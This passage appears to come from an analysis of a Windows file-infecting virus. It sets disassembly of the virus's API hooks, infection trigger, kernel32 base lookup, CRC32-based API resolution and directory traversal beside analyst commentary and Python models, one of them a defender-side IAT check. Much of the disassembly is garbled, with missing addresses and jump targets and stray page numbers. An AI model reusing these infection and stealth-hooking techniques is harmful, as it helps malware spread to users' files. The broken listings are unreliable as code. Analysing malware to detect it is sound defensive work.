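    # HookAPIs uppercases the DLL name before hashing it.
    return crc32(name.upper())


def cstr(img: bytearray, off: int) -> bytes:
    return bytes(img[off:img.index(b"\0", off)])


def build_fake_host(imports: dict, resolved: dict) -> bytearray:
    """Constructed sample host: flat PE32 image (RVA == offset) with a DOS header,
    PE header and an import directory for `imports` (dll -> [names]). `resolved`
    (name -> address) pre-fills the IAT as the loader would. Only fields that
    HookAPIs reads are filled in."""
    img = bytearray(0x1000)
    img[0:2] = b"MZ"
    pe = 0x80
    struct.pack_into("<I", img, 0x3C, pe)                  # e_lfanew
    img[pe:pe + 4] = b"PE\0\0"
    struct.pack_into("<I", img, pe + 0x80, 0x200)         # import directory RVA
    desc, thunk, strs = 0x200, 0x300, 0x600
    for dll, names in imports.items():
        int_rva = thunk                                    # OriginalFirstThunk
        iat_rva = thunk + 4 * (len(names) + 1)             # FirstThunk (the IAT)
        struct.pack_into("<I", img, desc, int_rva)
        struct.pack_into("<I", img, desc + 0x0C, strs)     # DLL name RVA
        struct.pack_into("<I", img, desc + 0x10, iat_rva)
        img[strs:strs + len(dll) + 1] = dll + b"\0"
        strs += len(dll) + 1
        for i, name in enumerate(names):
            struct.pack_into("<I", img, int_rva + 4 * i, strs)   # hint/name entry
            struct.pack_into("<I", img, iat_rva + 4 * i, resolved[name])
            img[strs + 2:strs + 2 + len(name) + 1] = name + b"\0"  # 2-byte hint left 0
            strs += 2 + len(name) + 1
        thunk = iat_rva + 4 * (len(names) + 1)
        desc += 0x14                                       # next descriptor
    return img


def iter_imports(img: bytearray):
    """Yield (dll_name, iat_offset, function_name_or_None) per import, walking the
    descriptors as HookAPIs does: stop at a zero OriginalFirstThunk, 14h bytes per
    descriptor, name string at hint/name entry + 2, ordinal imports carry no name."""
    pe = struct.unpack_from("<I", img, 0x3C)[0]
    desc = struct.unpack_from("<I", img, pe + 0x80)[0]
    while struct.unpack_from("<I", img, desc)[0] != 0:
        int_rva, _, _, name_rva, iat_rva = struct.unpack_from("<IIIII", img, desc)
        dll = cstr(img, name_rva)
        i = 0
        while (entry := struct.unpack_from("<I", img, int_rva + 4 * i)[0]) != 0:
            fn = None if entry & IMAGE_ORDINAL_FLAG32 else cstr(img, entry + 2)
            yield dll, iat_rva + 4 * i, fn
            i += 1
        desc += 0x14


def hook_iat(img: bytearray, dll_crc: int, hook_table: dict) -> dict:
    """Mirror of HookAPIs: for every by-name import of the DLL whose uppercased name
    hashes to dll_crc, if the name's CRC32 is a key of hook_table {crc: stub_addr},
    save the original IAT value and overwrite the slot. Returns {crc: original}."""
    saved = {}
    for dll, iat_off, fn in iter_imports(img):
        if fn is None or crc32_upper(dll) != dll_crc:
            continue
        h = crc32(fn)
        if h in hook_table:
            saved[h] = struct.unpack_from("<I", img, iat_off)[0]
            struct.pack_into("<I", img, iat_off, hook_table[h])
    return saved


def suspicious_iat_entries(img: bytearray, module_ranges: dict) -> list:
    """Defender-side check: IAT slots whose target is outside the address range of
    the module they claim to import from."""
    bad = []
    for dll, iat_off, fn in iter_imports(img):
        lo, hi = module_ranges[dll.upper()]
        target = struct.unpack_from("<I", img, iat_off)[0]
        if not lo <= target < hi:
            bad.append((fn, target))
    return bad


# Constructed sample data: all addresses are hypothetical.
KERNEL32, USER32 = (0x7C800000, 0x7C8F6000), (0x77D40000, 0x77DD0000)
RESOLVED = {b"CreateFileA": 0x7C801A28, b"WinExec": 0x7C86136D,
            b"GetTickCount": 0x7C80932E, b"MessageBoxA": 0x77D8050B}
# Hypothetical stub addresses (the real ones are EntryPoint + the API_Hook_Table offset).
HOOK_TABLE = {crc32(b"CreateFileA"): 0x004016FF, crc32(b"WinExec"): 0x0040170A}


def run_demo():
    """Build the host, hook kernel32's IAT and report what the scanner sees before and after."""
    img = build_fake_host({b"kernel32.dll": [b"CreateFileA", b"WinExec", b"GetTickCount"],
                           b"user32.dll": [b"MessageBoxA"]}, RESOLVED)
    ranges = {b"KERNEL32.DLL": KERNEL32, b"USER32.DLL": USER32}
    before = suspicious_iat_entries(img, ranges)
    saved = hook_iat(img, crc32_upper(b"kernel32.dll"), HOOK_TABLE)
    return before, saved, suspicious_iat_entries(img, ranges)


if __name__ == "__main__":
    print(run_demo())
```

The range check is deliberately coarse: it catches this virus because the stubs live in the host's own image, but a hook that points into another legitimately loaded module needs the stronger comparison against the exporting module's actual export addresses.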

20 CODE: CODE: C CODE: C call GenericHookHandler CODE: C CODE: jmp AH_MoveFileExA CODE: CODE: CODE: call GenericHookHandler CODE: CODE: C jmp AH_FindFirstFileA CODE: C CODE: CODE: call GenericHookHandler CODE: CODE: jmp AH_GetFullPathNameA CODE: CODE: D CODE: D call GenericHookHandler CODE: D CODE: jmp AH_GetShortPathNameA CODE: CODE: CODE: call GenericHookHandler CODE: CODE: D jmp AH_SetFileAttributesA CODE: D CODE: CODE: call GenericHookHandler CODE: CODE: jmp AH_GetFileAttributesA CODE: CODE: E CODE: E call GenericHookHandler CODE: E CODE: jmp AH_GetBinaryTypeA CODE: CODE: CODE: pushf CODE: A pusha CODE: B call Initialize CODE: B CODE:004017A0 test eax, eax CODE:004017A2 jz short loc_4017cf CODE:004017A2 CODE:004017A4 or ThreadExecution, 0FFFFFFFFh CODE:004017AB push 0FFFFh CODE:004017B0 push ThreadHandle CODE:004017B6 mov al, 1Bh CODE:004017B8 call StealthAPI CODE:004017B8 CODE:004017BD push ThreadHandle CODE:004017C3 mov al, 5 CODE:004017C5 call StealthAPI CODE:004017C5 CODE:004017CA call UnInitialize CODE:004017CA CODE:004017CF

21 CODE:004017CF loc_4017cf: CODE:004017CF add esp, 1000h CODE:004017D5 popa CODE:004017D6 popf CODE:004017D7 jmp AH_ExitProcess CODE:004017D7 CODE:004017DD CODE:004017DD pushf CODE:004017DE pusha CODE:004017DF call Initialize CODE:004017DF CODE:004017E4 test eax, eax CODE:004017E6 jz short loc_40184a CODE:004017E6 CODE:004017E8 mov eax, 3 CODE:004017ED call RandomNumber CODE:004017ED CODE:004017F2 test eax, eax CODE:004017F4 jnz short loc_40184a CODE:004017F4 CODE:004017F6 push 0 CODE:004017F8 lea eax, PayloadThread CODE:004017FE push esp CODE:004017FF push 0 CODE: push 0 CODE: push eax CODE: push 0 CODE: push 0 CODE: mov al, 1Ah CODE: A call StealthAPI CODE: A CODE: F pop ebx CODE: test eax, eax CODE: jz short loc_40184a CODE: CODE: push eax CODE: mov al, 5 CODE: call StealthAPI CODE: CODE: C push 0 CODE: E lea eax, szpayloadmessage CODE: push eax CODE: lea eax, szpayloadtitle CODE: B push eax CODE: C push dword ptr [esp+1034h] CODE: mov al, 29h CODE: call StealthAPI CODE: CODE: A call UnInitialize CODE: A CODE: F add esp, 1000h CODE: popa CODE: popf CODE: retn 10h CODE: CODE: A CODE: A

22 CODE: A loc_40184a: CODE: A CODE: A call UnInitialize CODE: A CODE: F add esp, 1000h CODE: popa CODE: popf CODE: jmp AH_ShellAboutA The previous code block was a series of handlers for the hooked API functions. CODE: D GenericHookHandler proc near CODE: D CODE: D CODE: D arg_ff8 = dword ptr 0FFCh CODE: D arg_1004 = dword ptr 1008h CODE: D CODE: D pushf CODE: E pusha CODE: E CODE: F CODE: F cmp GenericHookState, 0 CODE: jnz CODE: CODE: or GenericHookState, 0FFFFFFFFh CODE: F call Initialize CODE: F CODE: test eax, eax CODE: jz CODE: CODE: cmp Infect_Encrypted, 0 CODE: F jz CODE: F CODE: mov esi, [esp+24h+arg_1004] CODE: lea edi, [ebp+13ch] CODE: E push edi CODE: F push esi CODE: mov al, 16h CODE: call StealthAPI CODE: CODE: inc eax CODE: jz CODE: CODE: A dec eax CODE: B push eax CODE: C mov al, 5 CODE: E call StealthAPI CODE: E CODE:004018A3 lea edi, [ebp+168h] CODE:004018A9 mov esi, [esp+30h+arg_ff8] CODE:004018A9 CODE:004018B0 CODE:004018B0 lodsb

23 CODE:004018B1 stosb CODE:004018B2 test al, al CODE:004018B4 jnz short CODE:004018B4 CODE:004018B6 call InfectFile CODE:004018B6 CODE:004018BB CODE:004018BB CODE:004018BB CODE:004018BB add esp, 1000h CODE:004018C1 and GenericHookState, 0 CODE:004018C8 popa CODE:004018C9 popf CODE:004018CA retn CODE:004018CA CODE:004018CA GenericHookHandler endp The previous code block is a generic hook handler routine for hooked API. CODE:004018CB Uppercase proc near CODE:004018CB CODE:004018CB pusha CODE:004018CC mov edi, esi CODE:004018CC CODE:004018CE CODE:004018CE lodsb CODE:004018CF cmp al, 'a' CODE:004018D1 jb CODE:004018D1 CODE:004018D3 cmp al, 'z' CODE:004018D5 ja CODE:004018D5 CODE:004018D7 and al, b CODE:004018D7 CODE:004018D9 CODE:004018D9 CODE:004018D9 stosb CODE:004018DA test al, al CODE:004018DC jnz CODE:004018DC CODE:004018DE popa CODE:004018DF retn CODE:004018DF CODE:004018DF Uppercase endp The previous code block reformats a string to be all uppercase. CODE:004018E0 RandomNumber proc near CODE:004018E0 CODE:004018E0 CODE:004018E0 var_4 = dword ptr -4 CODE:004018E0

CODE:004018E0 pusha CODE:004018E1 push eax CODE:004018E1 CODE:004018E2 CODE:004018E2 CODE:004018E2 cmp RandomNumberState, 0 CODE:004018E9 jnz CODE:004018E9 CODE:004018EB or RandomNumberState, 0FFFFFFFFh CODE:004018F2 call genrand_int32 CODE:004018F2 CODE:004018F7 pop ecx CODE:004018F8 xor edx, edx CODE:004018FA div ecx CODE:004018FC mov [esp+20h+var_4], edx CODE: and RandomNumberState, 0 CODE: popa CODE: retn CODE: CODE: RandomNumber endp

The previous code block returns a random number in the range [0, EAX): it spins on RandomNumberState, a crude lock around the generator state shared by the host thread and the virus threads, calls genrand_int32 and reduces the result modulo the requested range, writing the remainder into the saved-EAX slot of the pusha frame so that it comes back in EAX. The modulo reduction is slightly biased for ranges that do not divide 2^32, which does not matter here. MainThread uses it with EAX = 10h (plus one) to decide how many files, between 1 and 16, DirectoryTraversal may infect before the thread gives up ([ebp+27ch], decremented after each infection), and the ShellAboutA hook uses it with EAX = 3 to trigger the payload one time in three.

CODE: GetAPIsFromCRC32List proc near CODE: CODE: CODE: var_28 = dword ptr -28h CODE: var_24 = dword ptr -24h CODE: PA_EAX = dword ptr -4 CODE: ARG1 = dword ptr 4 CODE: ARG2 = dword ptr 8 CODE: ARG3 = dword ptr 0Ch CODE: ARG4 = dword ptr 10h CODE: CODE: pusha CODE: A or dword ptr [ebp+14h], 0FFFFFFFFh CODE: E mov ebx, [esp+20h+arg4] CODE: mov esi, [ebx+3ch] CODE: add esi, ebx CODE: mov esi, [esi+78h] CODE: A lea esi, [ebx+esi+18h] CODE: E lodsd CODE: F xchg eax, ecx CODE: inc ecx CODE: lodsd CODE: add eax, ebx CODE: push eax CODE: lodsd CODE: lea edi, [ebx+eax] CODE: mov edi, [edi] CODE: B add edi, ebx CODE: D lodsd CODE: E add eax, ebx CODE: push eax CODE:
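The RNGMT engine and the RandomNumber wrapper, as an added example (this is not the virus's code; it is the reference MT19937 algorithm, whose routine names init_genrand, init_by_array and genrand_int32 the virus keeps, plus a model of the seeding seen in Initialize). The model takes the RDTSC value as an input so that the seeding can be replayed offline; Init_Key_Start is not on the page, so a constructed 16-dword key stands in for it.

```python
class MT19937:
    """MT19937 as in the reference C implementation (init_genrand, init_by_array,
    genrand_int32)."""
    N, M = 624, 397
    MATRIX_A, UPPER, LOWER = 0x9908B0DF, 0x80000000, 0x7FFFFFFF

    def __init__(self, seed: int = 5489):
        self.mt = [0] * self.N
        self.init_genrand(seed)

    def init_genrand(self, s: int) -> None:
        mt = self.mt
        mt[0] = s & 0xFFFFFFFF
        for i in range(1, self.N):
            mt[i] = (1812433253 * (mt[i - 1] ^ (mt[i - 1] >> 30)) + i) & 0xFFFFFFFF
        self.mti = self.N                       # force a full regeneration on first use

    def init_by_array(self, key: list) -> None:
        mt, N = self.mt, self.N
        self.init_genrand(19650218)
        i, j = 1, 0
        for _ in range(max(N, len(key))):       # non-linear mixing of the key words
            mt[i] = ((mt[i] ^ ((mt[i - 1] ^ (mt[i - 1] >> 30)) * 1664525)) + key[j] + j) & 0xFFFFFFFF
            i, j = i + 1, j + 1
            if i >= N:
                mt[0], i = mt[N - 1], 1
            if j >= len(key):
                j = 0
        for _ in range(N - 1):
            mt[i] = ((mt[i] ^ ((mt[i - 1] ^ (mt[i - 1] >> 30)) * 1566083941)) - i) & 0xFFFFFFFF
            i += 1
            if i >= N:
                mt[0], i = mt[N - 1], 1
        mt[0] = 0x80000000                      # MSB set guarantees a non-zero state

    def genrand_int32(self) -> int:
        mt, N, M = self.mt, self.N, self.M
        if self.mti >= N:                       # generate the next N words in place
            for k in range(N):
                y = (mt[k] & self.UPPER) | (mt[(k + 1) % N] & self.LOWER)
                mt[k] = mt[(k + M) % N] ^ (y >> 1) ^ (self.MATRIX_A if y & 1 else 0)
            self.mti = 0
        y = mt[self.mti]
        self.mti += 1
        y ^= y >> 11                            # tempering
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        return (y ^ (y >> 18)) & 0xFFFFFFFF


# Constructed stand-in for the 16 dwords at Init_Key_Start (not the real values).
INIT_KEY = [(0x11111111 * (k + 1)) & 0xFFFFFFFF for k in range(16)]


def seed_like_scream(tsc: int, init_key: list = INIT_KEY) -> MT19937:
    """Model of Initialize's seeding: the low dword of RDTSC is XORed into the key
    dword selected by (high dword mod 16), then init_by_array runs over the key.
    Only those 36 bits vary, so the whole stream is a function of one TSC reading."""
    key = list(init_key)
    key[(tsc >> 32) % 16] ^= tsc & 0xFFFFFFFF
    gen = MT19937()
    gen.init_by_array(key)
    return gen


def random_number(gen: MT19937, n: int) -> int:
    """RandomNumber: genrand_int32 reduced modulo EAX, i.e. a value in [0, n)."""
    return gen.genrand_int32() % n


def files_per_pass(gen: MT19937) -> int:
    """MainThread: RandomNumber(10h) + 1, the infection budget of one traversal."""
    return random_number(gen, 0x10) + 1


if __name__ == "__main__":
    g = seed_like_scream(0x0000_1234_9ABC_DEF0)   # a made-up TSC value
    print(files_per_pass(g), [random_number(g, 3) for _ in range(5)])
```

The two reference test vectors (seed 5489 gives 3499211612; the key 123h, 234h, 345h, 456h gives 1067595299) confirm the implementation matches the reference generator, which is what makes replaying the virus's choices from a recovered TSC value possible.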

25 CODE: CODE: CODE: CODE: dec ecx CODE: jecxz short CODE: CODE: xchg esi, edi CODE: inc dword ptr [ebp+14h] CODE: call GetCRC32OfString CODE: CODE: E mov edi, esi CODE: mov esi, [esp+28h+arg1] CODE: or edx, 0FFFFFFFFh CODE: CODE: CODE: CODE: inc edx CODE: lodsd CODE: test eax, eax CODE: B jz short CODE: B CODE: D cmp eax, ebx CODE: F jnz short CODE: F CODE: mov esi, [esp+28h+var_28] CODE: mov ebx, [ebp+14h] CODE: movzx ebx, word ptr [esi+ebx*2] CODE: B mov esi, [esp+28h+var_24] CODE: F mov ebx, [esi+ebx*4] CODE: add ebx, [esp+28h+arg4] CODE: mov eax, [esp+28h+arg2] CODE: A lea eax, [eax+edx*4] CODE: D mov [eax], ebx CODE: F jmp short CODE: F CODE: CODE: CODE: CODE: mov esi, [esp+28h+arg2] CODE: mov ecx, [esp+28h+arg3] CODE: CODE: CODE: CODE: lodsd CODE: A test eax, eax CODE: C jz short CODE: C CODE: E loop CODE: E CODE: CODE: CODE: add esp, 8 CODE: mov [esp+20h+pa_eax], eax CODE: popa CODE: retn 10h CODE: CODE: GetAPIsFromCRC32List endp

The previous code block resolves API addresses from a list of CRC32 checksums. It takes four arguments: a pointer to the CRC32 list, a pointer to the buffer that receives the API addresses, the number of APIs to resolve and the base address of the DLL. It walks the DLL's export directory (RVA at offset 78h of the PE header): for each exported name (NumberOfNames at +18h, AddressOfNames at +20h) it computes the CRC32 and scans the requested list; on a hit it maps the name index through the 16-bit ordinal table (AddressOfNameOrdinals) into the function address table (AddressOfFunctions) and stores base + RVA into the output slot at the same index as the checksum. Finally it scans the output buffer and fails (EAX = 0) if any of the requested entries is still empty. Forwarded exports are not handled: for those base + RVA points at the forwarder string rather than at code.

CODE: B GetCRC32OfString proc near CODE: B CODE: B push eax CODE: C push ecx CODE: D push edx CODE: E push edi CODE: F cld CODE: xor ecx, ecx CODE: dec ecx CODE: mov edx, ecx CODE: CODE: CODE: cmp byte ptr [esi], 0 CODE: jz CODE: CODE: A xor eax, eax CODE: C xor ebx, ebx CODE: E lodsb CODE: F xor al, cl CODE:004019A1 mov cl, ch CODE:004019A3 mov ch, dl CODE:004019A5 mov dl, dh CODE:004019A7 mov dh, 8 CODE:004019A7 CODE:004019A9 CODE:004019A9 shr bx, 1 CODE:004019AC rcr ax, 1 CODE:004019AF jnb CODE:004019AF CODE:004019B1 xor ax, 8320h CODE:004019B5 xor bx, 0EDB8h CODE:004019B5 CODE:004019BA CODE:004019BA dec dh CODE:004019BC jnz CODE:004019BC CODE:004019BE xor ecx, eax CODE:004019C0 xor edx, ebx CODE:004019C2 dec edi CODE:004019C3 jnz CODE:004019C3 CODE:004019C5 CODE:004019C5 not edx CODE:004019C7 not ecx CODE:004019C9 mov eax, edx

CODE:004019CB rol eax, 10h CODE:004019CE mov ax, cx CODE:004019D1 inc esi CODE:004019D2 xchg eax, ebx CODE:004019D3 pop edi CODE:004019D4 pop edx CODE:004019D5 pop ecx CODE:004019D6 pop eax CODE:004019D7 retn CODE:004019D7 CODE:004019D7 GetCRC32OfString endp

The previous code block calculates the CRC32 of a zero-terminated ASCII string. It expects the pointer in ESI, returns the checksum in EBX (the final xchg eax, ebx) and leaves ESI just past the terminator, which is how the table-building loops step from one name to the next. The running value is kept in the DX:CX pair, pre-set to -1, shifted right one byte per input character and inverted at the end, and the per-byte term is computed bit by bit with the polynomial 0EDB88320h (the 0EDB8h/8320h pair above): this is the standard reflected CRC-32 as produced by zlib, so the checksum tables inside the virus can be regenerated, and reversed to names, with any ordinary crc32() over a list of export names.

CODE:004019D8 GetKernel32Base proc near CODE:004019D8 push eax CODE:004019D9 push esi CODE:004019DA xor esi, esi CODE:004019DC mov esi, fs:[esi] CODE:004019DC CODE:004019DF CODE:004019DF mov eax, [esi] CODE:004019E1 inc eax CODE:004019E2 jz CODE:004019E2 CODE:004019E4 dec eax CODE:004019E5 xchg eax, esi CODE:004019E6 jmp CODE:004019E6 CODE:004019E8 CODE:004019E8 CODE:004019E8 mov eax, [esi+4] CODE:004019EB xor ax, ax CODE:004019EB CODE:004019EE CODE:004019EE cmp word ptr [eax], 5A4Dh CODE:004019F3 jz CODE:004019F3 CODE:004019F5 CODE:004019F5 sub eax, 10000h CODE:004019FA jmp CODE:004019FA CODE:004019FC CODE:004019FC CODE:004019FC mov [ebp+0], eax CODE:004019FF mov esi, [eax+3ch] CODE:00401A02 add esi, eax CODE:00401A04 cmp dword ptr [esi], 4550h CODE:00401A0A jnz
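The hashing and export-table lookup of GetAPIsFromCRC32List and GetCRC32OfString above, as an added example written for this page (it is not the virus's code). It implements the same bit-serial CRC-32, walks the export directory fields the virus reads (NumberOfNames at +18h, then the function, name and ordinal tables) over a constructed flat PE32 image whose RVAs equal offsets, and adds the reverse lookup an analyst needs to turn a recovered checksum table back into API names. The export names, RVAs and the base address are made up.

```python
import struct


def crc32_string(name: bytes) -> int:
    """Bit-serial reflected CRC-32 (polynomial 0xEDB88320, state pre-set to
    0xFFFFFFFF and inverted at the end), the algorithm GetCRC32OfString
    implements with its 8320h/0EDB8h register pair; equal to zlib.crc32."""
    crc = 0xFFFFFFFF
    for b in name:
        crc ^= b
        for _ in range(8):
            crc = (crc >> 1) ^ 0xEDB88320 if crc & 1 else crc >> 1
    return crc ^ 0xFFFFFFFF


def build_fake_image(exports: dict) -> bytes:
    """Constructed sample: flat PE32 image (RVA == offset) whose export directory
    lists `exports` (name -> function RVA). Only the fields the virus reads are
    filled in; real DLLs are laid out the same way."""
    names = sorted(exports)                 # real export name tables are sorted
    img = bytearray(0x1000)
    img[0:2] = b"MZ"
    pe = 0x80
    struct.pack_into("<I", img, 0x3C, pe)                   # e_lfanew
    img[pe:pe + 4] = b"PE\0\0"
    exp, funcs, name_ptrs, ords, strs = 0x200, 0x300, 0x400, 0x500, 0x600
    struct.pack_into("<I", img, pe + 0x78, exp)             # export directory RVA
    n = len(names)
    # +14h NumberOfFunctions, +18h NumberOfNames, +1Ch/+20h/+24h the three tables
    struct.pack_into("<IIIII", img, exp + 0x14, n, n, funcs, name_ptrs, ords)
    for i, name in enumerate(names):
        struct.pack_into("<I", img, funcs + 4 * i, exports[name])
        struct.pack_into("<I", img, name_ptrs + 4 * i, strs)
        struct.pack_into("<H", img, ords + 2 * i, i)
        img[strs:strs + len(name) + 1] = name + b"\0"
        strs += len(name) + 1
    return bytes(img)


def resolve_by_crc32(image: bytes, base: int, wanted: list) -> list:
    """Mirror of GetAPIsFromCRC32List: hash every exported name and fill the slot
    of each matching checksum in `wanted` with base + function RVA. A slot left
    at None is a missing API, the case the virus reports as failure. Forwarded
    exports are not handled, just as in the virus."""
    pe = struct.unpack_from("<I", image, 0x3C)[0]
    if image[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    exp = struct.unpack_from("<I", image, pe + 0x78)[0]
    n_names, funcs, name_ptrs, ords = struct.unpack_from("<IIII", image, exp + 0x18)
    out = [None] * len(wanted)
    for i in range(n_names):
        rva = struct.unpack_from("<I", image, name_ptrs + 4 * i)[0]
        h = crc32_string(image[rva:image.index(b"\0", rva)])
        for slot, want in enumerate(wanted):
            if want == h:
                ordinal = struct.unpack_from("<H", image, ords + 2 * i)[0]
                out[slot] = base + struct.unpack_from("<I", image, funcs + 4 * ordinal)[0]
    return out


def names_for_hashes(hashes: list, candidates: list) -> dict:
    """Analyst-side reverse lookup: recover API names from a checksum table by
    hashing a candidate list (for instance the export names of kernel32.dll)."""
    table = {crc32_string(c): c for c in candidates}
    return {h: table.get(h) for h in hashes}


# Constructed sample: three exports with made-up RVAs, mapped at a made-up base.
SAMPLE_IMAGE = build_fake_image({b"CreateFileA": 0x1A28, b"WinExec": 0x6136D,
                                 b"ExitProcess": 0x1CAA})
SAMPLE_BASE = 0x7C800000


if __name__ == "__main__":
    wanted = [crc32_string(b"WinExec"), crc32_string(b"CreateFileA")]
    print([hex(a) for a in resolve_by_crc32(SAMPLE_IMAGE, SAMPLE_BASE, wanted)])
```

The reverse lookup is the step that matters when a fresh hash list is dumped from a sample: hash the export names of the DLLs the sample loads and match, rather than trying to invert the CRC.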

CODE:00401A0A CODE:00401A0C pop esi CODE:00401A0D pop eax CODE:00401A0E retn CODE:00401A0E CODE:00401A0E GetKernel32Base endp

The previous code block finds the base address of kernel32 through the SEH chain. Starting at fs:[0] it follows the Next links until it reaches the last frame (Next = 0FFFFFFFFh), whose handler is expected to live inside kernel32. It rounds that handler address down to a 64K boundary (xor ax, ax) and steps down 10000h at a time until it finds an MZ header whose e_lfanew points to a PE signature, then stores the base at [ebp+0]. Two caveats: the technique assumes the bottom-of-chain handler really is in kernel32, which holds for the Windows versions of the period but not where the default handler lives in another module (the scan would then return that module instead), and the downward scan has no lower bound, so on a miss it walks into unmapped memory and relies on the virus's own SEH frame to survive the fault.

CODE:00401A0F DirectoryTraversal proc near CODE:00401A0F CODE:00401A0F var_17c = dword ptr -17Ch CODE:00401A0F var_170 = dword ptr -170h CODE:00401A0F var_144 = dword ptr -144h CODE:00401A0F var_40 = dword ptr -40h CODE:00401A0F CODE:00401A0F pusha CODE:00401A10 push 0 CODE:00401A12 lea eax, DIR_Root+2 CODE:00401A18 push eax CODE:00401A19 mov al, 0Ch CODE:00401A1B call StealthAPI CODE:00401A1B CODE:00401A20 test eax, eax CODE:00401A22 CODE:00401A22 CODE:00401A28 CODE:00401A28 sub esp, 140h CODE:00401A2E push esp CODE:00401A2F lea eax, DIR_Wildcards CODE:00401A35 push eax CODE:00401A36 mov al, 16h CODE:00401A38 call StealthAPI CODE:00401A38 CODE:00401A3D push eax CODE:00401A3E inc eax CODE:00401A3F CODE:00401A3F CODE:00401A45 dec eax CODE:00401A45 CODE:00401A46 CODE:00401A46 lea ebx, [esp+174h+var_144] CODE:00401A4A test byte ptr [esp+174h+var_170], 10h CODE:00401A4F jz CODE:00401A4F CODE:00401A51 cmp byte ptr [ebx], '.' CODE:00401A54 jz CODE:00401A54 CODE:00401A56 push ebx CODE:00401A57 mov al, 0Ch CODE:00401A59 call StealthAPI CODE:00401A59

29 CODE:00401A5E jmp short CODE:00401A5E CODE:00401A60 ; CODE:00401A60 CODE:00401A60 lea esi, [esp+174h+var_170] CODE:00401A64 lea edi, [ebp+13ch] CODE:00401A6A mov ecx, 140h CODE:00401A6F rep movsb CODE:00401A71 push eax CODE:00401A72 lea esi, [ebp+168h] CODE:00401A78 call Uppercase CODE:00401A78 CODE:00401A7D call GetCRC32OfString CODE:00401A7D CODE:00401A82 lea esi, CRC32_Checksumfile_List CODE:00401A82 CODE:00401A88 CODE:00401A88 lodsd CODE:00401A89 xchg eax, ecx CODE:00401A8A jecxz CODE:00401A8A CODE:00401A8C cmp ebx, ecx CODE:00401A8E jnz CODE:00401A8E CODE:00401A90 lea esi, [ebp+168h] CODE:00401A96 push esi CODE:00401A97 push 80h CODE:00401A9C push esi CODE:00401A9D mov al, 11h CODE:00401A9F call StealthAPI CODE:00401A9F CODE:00401AA4 mov al, 15h CODE:00401AA6 call StealthAPI CODE:00401AA6 CODE:00401AAB pop eax CODE:00401AAC jmp CODE:00401AAC CODE:00401AAE CODE:00401AAE CODE:00401AAE pop eax CODE:00401AAF or dword ptr [ebp+280h], 0FFFFFFFFh CODE:00401AB6 call InfectFile CODE:00401AB6 CODE:00401ABB inc dword ptr [ebp+280h] CODE:00401AC1 jz CODE:00401AC1 CODE:00401AC3 dec dword ptr [ebp+27ch] CODE:00401AC9 jz CODE:00401AC9 CODE:00401ACB CODE:00401ACB CODE:00401ACB lea ebx, [esp+174h+var_170]

30 CODE:00401ACF push ebx CODE:00401AD0 push eax CODE:00401AD1 mov al, 17h CODE:00401AD3 call StealthAPI CODE:00401AD3 CODE:00401AD8 cmp ThreadExecution, 0FFFFFFFFh CODE:00401ADF jz short CODE:00401ADF CODE:00401AE1 test eax, eax CODE:00401AE3 mov eax, [esp+17ch+var_17c] CODE:00401AE6 jnz CODE:00401AE6 CODE:00401AEC CODE:00401AEC CODE:00401AEC push eax CODE:00401AED mov al, 18h CODE:00401AEF call StealthAPI CODE:00401AEF CODE:00401AF4 lea eax, DIR_Parent CODE:00401AFA push eax CODE:00401AFB mov al, 0Ch CODE:00401AFD call StealthAPI CODE:00401AFD CODE:00401B02 add esp, 144h CODE:00401B08 mov eax, [esp+40h+var_40] CODE:00401B0B test eax, eax CODE:00401B0D jnz short CODE:00401B0D CODE:00401B0F CODE:00401B0F CODE:00401B0F CODE:00401B0F add esp, 4 CODE:00401B12 popa CODE:00401B13 retn CODE:00401B13 CODE:00401B14 CODE:00401B14 CODE:00401B14 CODE:00401B14 mov esi, esp CODE:00401B16 lodsd CODE:00401B17 test eax, eax CODE:00401B19 jz CODE:00401B19 CODE:00401B1B mov al, 18h CODE:00401B1D call StealthAPI CODE:00401B1D CODE:00401B22 add esp, 140h CODE:00401B28 jmp CODE:00401B28 CODE:00401B28 DirectoryTraversal endp The previous code block traverses the directories looking for files to infect. CODE:00401B2A init_genrand proc near

31 CODE:00401B2A CODE:00401B2A ARG1 = dword ptr 4 CODE:00401B2A CODE:00401B2A pusha CODE:00401B2B lea edi, [ebp+304h] CODE:00401B31 xor ecx, ecx CODE:00401B33 mov eax, [esp+20h+arg1] CODE:00401B37 stosd CODE:00401B37 CODE:00401B38 CODE:00401B38 inc ecx CODE:00401B39 cmp ecx, 270h CODE:00401B3F jz CODE:00401B3F CODE:00401B41 mov edx, eax CODE:00401B43 shr edx, 1Eh CODE:00401B46 xor eax, edx CODE:00401B48 imul eax, 6C078965h CODE:00401B4E add eax, ecx CODE:00401B50 stosd CODE:00401B51 jmp CODE:00401B51 CODE:00401B53 CODE:00401B53 CODE:00401B53 mov [ebp+300h], ecx CODE:00401B59 popa CODE:00401B5A retn 4 CODE:00401B5A CODE:00401B5A init_genrand endp The previous code block initializes an array with a 32 bit seed. CODE:00401B5D init_by_array proc near CODE:00401B5D CODE:00401B5D var_24 = dword ptr -24h CODE:00401B5D arg_0 = dword ptr 4 CODE:00401B5D arg_4 = dword ptr 8 CODE:00401B5D CODE:00401B5D pusha CODE:00401B5E lea edi, [ebp+304h] CODE:00401B64 mov esi, [esp+20h+arg_0] CODE:00401B68 xor edx, edx CODE:00401B6A push edx CODE:00401B6B inc edx CODE:00401B6C mov eax, [esp+24h+arg_4] CODE:00401B70 mov ecx, 270h CODE:00401B75 cmp eax, ecx CODE:00401B77 jl CODE:00401B77 CODE:00401B79 mov ecx, eax CODE:00401B79 CODE:00401B7B

